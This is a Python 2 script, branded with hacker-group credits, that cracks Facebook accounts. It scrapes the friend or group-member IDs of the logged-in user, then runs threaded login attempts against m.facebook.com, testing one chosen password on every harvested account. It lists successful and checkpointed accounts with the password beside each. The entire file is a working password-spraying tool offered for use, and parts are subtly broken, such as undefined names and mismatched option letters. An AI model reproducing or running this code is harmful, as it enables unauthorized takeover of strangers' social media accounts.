#!/bin/bash
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib
from multiprocessing.pool import ThreadPool
import platform,os,sys

def cetak(x,e=0):
	w = 'mhkbpcP'
	for i in w:
		j = w.index(i)
		x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
	x += '\033[0m'
	x = x.replace('!0','\033[0m')
	if e != 0:
		sys.stdout.write(x)
	else:
		sys.stdout.write(x+'\n')
if platform.python_version().split('.')[0] != '2':
	cetak('    !m[!] You are using python version%s, please use version 2.x.x'%v().split(' ')[0])
	sys.exit()
import cookielib,re,urllib2,urllib,threading
try:
  import mechanize
except ImportError:
	cetak('  * !m[!] It looks like Module mechanize M hasn t been installed yet....\n!h[!] pip2 install mechanize')
	sys.exit()
br = 0
log = 0
id_bteman = []
id_bgroup = []
fid_bteman = []
fid_bgroup = []
class mt(threading.Thread):
	def __init__(self,i,p):
		threading.Thread.__init__(self)
		self.id = i
		self.a = 0
		self.p = p
	def update(self):
		return self.a,self.id
	def run(self):
		try:
			data = urllib2.urlopen(urllib2.Request(url='https://m.facebook.com/login.php',data=urllib.urlencode({'email':self.id,'pass':self.p}),headers={'User-Agent':'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16'}))
		except KeyboardInterrupt:
			sys.exit()
		except:
			self.a = 4
			sys.exit()
		if 'm_sess' in data.url or 'save-device' in data.url:
			self.a = 1
		elif 'checkpoint' in data.url:
			self.a = 2
		else:
			self.a = 3
def crack(d):
	while 1:
		s = inputD('    [?] Sandi')
		if len(s) < 6:
			cetak('    !m[!] Minimum number of letters !k6')
		else:
			break
	return crack0(d,s)
def tampilhasil(akun,sandi,data):
	cekpoint = []
	salah = 0
	berhasil = []
	for i in akun:
		st,id = i
		if st == 1:
			berhasil.append(id)
		elif st == 2:
			cekpoint.append(id)
		elif st == 3:
			salah += 1
	cetak('    !h[*] Success !c%d'%len(berhasil))
	if len(berhasil) != 0:
		for i in berhasil:
			cetak('!h### !p%s !m=> !b[!k%s!b]'%(i,sandi))
	cetak('    !k[*] Cekpoint !c%d'%len(cekpoint))
	if len(cekpoint) != 0:
		for i in cekpoint:
			cetak('!k### !p%s !m=> !b[!k%s!b]'%(i,sandi))
	cetak('    !m[*] Failed    !c'+str(salah))
	i = inputD('    [?] Not Satisfied with Results, Want to try again (y/n)',['Y','N'])
	if i.upper() == 'Y':
		return crack(data)
	else:
		return menu()
def crack0(data,sandi):
	akun = []
	cetak('    !h[*] Cracking !k%d Account With Password !m[!k%s!m]'%(len(data),sandi))
	cetak('    !h[*] Cracking  !k0!m%',1)
	sys.stdout.flush()
	jml0,jml1 = 0,0
	th = []
	for i in data:
		i = i.replace(' ','')
		i = i.replace('\n','')
		if len(i) != 0:th.append(mt(i,sandi))
		jml1 += 1
	for i in th:
		i.daemon = True
		try:i.start()
		except KeyboardInterrupt:exit()
	h_error = []
	error = 0
	while 1:
		try:
			for i in th:
				status,id = i.update()
				if status != 0:
					cetak('    \r!h[*] Cracking  !k%d!m%s!0'%(int(float((float(jml0)/float(jml1))*100)),'%'),1)
					sys.stdout.flush()
					del(th[th.index(i)])
					if status == 4:
						h_error.append(id)
						if h_error.count(id) == 3:
							pass
						else:
							th.append(mt(id,sandi))
							th[len(th)-1].daemon = True
							th[len(th)-1].start()
					else:
						jml0 += 1
						akun.append((status,id))
		except KeyboardInterrupt:
			sys.exit()
		try:
			if threading.activeCount() == 1:break
		except KeyboardInterrupt:
			keluar()
	cetak('    \r!h[*] Cracking  !k100!m%      ')
	tampilhasil(akun,sandi,data)
def install_browser():
	global br
	br = mechanize.Browser()
	br.set_handle_robots(False)
	br.set_handle_equiv(True)
	br.set_handle_referer(True)
	br.set_cookiejar(cookielib.LWPCookieJar())
	br.set_handle_redirect(True)
	br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
	br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def bacaData():
	global fid_bgroup,fid_bteman
	try:
		fid_bgroup = open(os.sys.path[0]+'/MBFgroup.txt','r').readlines()
	except:pass
	try:
		fid_bteman = open(os.sys.path[0]+'/MBFteman.txt','r').readlines()
	except:pass
def simpan():
	if len(id_bgroup) != 0:
		cetak('    !h[*] Save the results of the Group')
		try:
			open(os.sys.path[0]+'/MBFgroup.txt','w').write('\n'.join(id_bgroup))
			cetak('    !h[!] Saved successfully !cMBFgroup.txt')
		except:
			cetak('    !m[!] Saving failed')
	if len(id_bteman) != 0:
		cetak('    !h[*] Save the list of Friends...')
		try:
			open(os.sys.path[0]+'/MBFteman.txt','w').write('\n'.join(id_bteman))
			cetak('  !h[!] Saved successfully !cMBFteman.txt')
		except:
			cetak('  !m[!] Saving failed')
def keluar():
	simpan()
	cetak('    !m[!] EXIT')
	sys.exit()
def inputD(x,v=0):
	while 1:
		try:
			a = raw_input('\x1b[32;1m%s\x1b[31;1m:\x1b[33;1m'%x)
		except:
			cetak('\n    !m[!] Cancel it')
			keluar()
		if v:
			if a.upper() in v:
				break
			else:
				cetak('    !m[!] Enter the options, Bro...')
				continue
		else:
			if len(a) == 0:
				cetak('    !m[!] Enter correctly')
				continue
			else:
				break
	return a
def inputM(x,d):
	while 1:
		try:
			i = int(inputD(x))
		except:
			cetak('    !m[!] Option not available')
			continue
		if i in d:
			break
		else:
			cetak('    !m[!] Option not available')
	return i
def lanjutG():
	global fid_bgroup
	if len(fid_bgroup) != 0:
		i = inputD('[?] Research Results ID Group / Continued (r/l)',['R','C'])
		if i.upper() == 'C':
			return crack(fid_bgroup)
		else:
			os.remove(os.sys.path[0]+'/MBFgroup.txt')
			fid_bgroup = []
	return 0
def lanjutT():
	global fid_bteman
	if len(fid_bteman) != 0:
		i = inputD('    [?] Research the results of the friend ID / continue (r/c)',['R','C'])
		if i.upper() == 'C':
			return crack(fid_bteman)
		else:
			os.remove(os.sys.path[0]+'/MBFteman.txt')
			fid_bteman = []
	return 0
def buka(d):
	try:
		x = br.open(d)
		br._factory.is_html = True
		x = x.read()
	except:
		cetak('    \r!m[!] Failed to open !p'+str(d))
		keluar()
	if '<link rel="redirect" href="' in x:
		return buka(br.find_link().url)
	else:
		return x
def login():
	global log
	us = inputD('    [?] Email/HP  ')
	pa = inputD('    [?] Password')
	cetak('!h[*] Login is....')
	buka('https://m.facebook.com')
	br.select_form(nr=0)
	br.form['email']=us
	br.form['pass']=pa
	br.submit()
	url = br.geturl()
	if 'save-device' in url or 'm_sess' in url:
		buka('https://mobile.facebook.com/home.php')
		nama = br.find_link(url_regex='logout.php').text
		nama = re.findall(r'\((.*a?)\)',nama)[0]
		cetak('    !h[*] Welcome !k%s'%nama)
		cetak('    !h[*] Hopefully this is your lucky day...')
		log = 1
	elif 'checkpoint' in url:
		cetak('    !m[!] Account got checkpoint\n!k[!]Try logging in with opera mini')
		keluar()
	else:
		cetak('    !m[!] Login Failed')
def idgroup():
	if log != 1:
		cetak('    !h[*] Login !bFB!h ...')
		login()
		if log == 0:
			keluar()
	next = saring_id_group0()
	while 1:
		saring_id_group1(buka(next))
		try:
			next = br.find_link(url_regex='/browse/group/members/').url
		except:
			cetak('    !m[!] Can Only Take  !h %d ID'%len(id_bgroup))
			break
	simpan()
	i = inputD('    [?] Crack right away (y/n)',['Y','N'])
	if i.upper() == 'Y':
		return crack(id_bgroup)
	else:
		return menu()
def saring_id_teman(r):
	for i in re.findall(r'/friends/hovercard/mbasic/\?uid=(.*?)&',r):
		id_bteman.append(i)
def idteman():
	if log != 1:
		cetak('  \033[1;35m* \033[1;37m[\033m\033[1;32m*\033[1;37m] \033[1;32mLogin !bFACEBOOK !hdulu tong...')
		login()
		if log == 0:
			keluar()
	cetak('    !h[*] Collecting friend ID...')
	buka('https://m.facebook.com/friends/center/mbasic/?fb_ref=bm&sr=1&ref_component=mbasic_bookmark&ref_page=XMenuController')
	jumlah = br.find_link(url_regex='/friends/center/friends/').text
	jumlah = re.findall(r'\((.*a?)\)',jumlah)[0]
	cetak('    !h[*] Take an !p%s !hID of friend'%jumlah) 
	saring_id_teman(buka('https://m.facebook.com/friends/center/friends/?fb_ref=fbm&ref_component=mbasic_bookmark&ref_page=XMenuController'))
	try:
		next = br.find_link(url_regex='friends_center_main').url
	except:
		if len(id_teman) != 0:
			cetak('    !m[!] Can only take !p%d id'%len(id_bteman))
		else:
			cetak('    !m[!] Cancel it')
			keluar()
	while 1:
		saring_id_teman(buka(next))
		cetak('\r!h    [*] !p%s !hID was taken...'%len(id_bteman),1)
		sys.stdout.flush()
		try:
			next = br.find_link(url_regex='friends_center_main').url
		except:
			cetak('\n!m    [!] Can only take !p%d ID'%len(id_bteman))
			break
	simpan()
	i = inputD('    [?] Crack right away (y/n)',['Y','N'])
	if i.upper() == 'Y':
		return crack(id_bteman)
	else:
		return menu()
def menu():
	cetak(" \033[1;31m┏━╮╭━┓ ╭━━━━━━╮\033[1;34m ╔╦╗╔╗ ╦═╗\n \033[1;31m┃┏┗┛┓┃╭┫*ERR0R┃\033[1;34m ║║║╠╩╗╠╣ \n \033[1;31m╰┓▋▋┏╯╯╰━━━━━━╯\033[1;34m ╩ ╩╚═╝╩  \n\033[1;31m╭━┻╮╲┗━━━━╮╭╮\033[1;35m *\033[1;37mAuthor  \033[1;31m: \033[1;36mITALIA CYBER ARMY033[1;31m┃▎▎┃╲╲╲╲╲╲┣━╯ \033[1;37m Developer \033[1;31m: \033[1;32m*ERR0R         \n\033[1;31m╰━┳┻▅╯╲╲╲╲┃   \033[1;37m Insta \033[1;31m  : \033[1;32m@termux_hacking\n  \033[1;31m╰━┳┓┏┳┓┏╯    \033[1;37mSource  \033[1;31m :\033[1;33m PIRMANSX            \n    \033[1;31m┗┻┛┗┻┛\n\n  \033[1;35m* \033[1;37m[\033[1;33m+\033[1;37m] \033[1;32mMenu\n        \033[1;37m{1} \033[1;33mCRACK FB TEMAN\n        \033[1;37m{2} \033[1;33mCRACK FB GROUP")
	i = inputM('    \033[1;37m[\033[1;32m?\033[1;37m] \033[1;32mChoose',[1,2,3])
	if i == 2:
		lanjutG()
		idgroup()
	elif i == 1:
		lanjutT()
		idteman()
	elif i == 3:
		keluar()
bacaData()
install_browser()
os.system('clear')
menu()
#
#
#
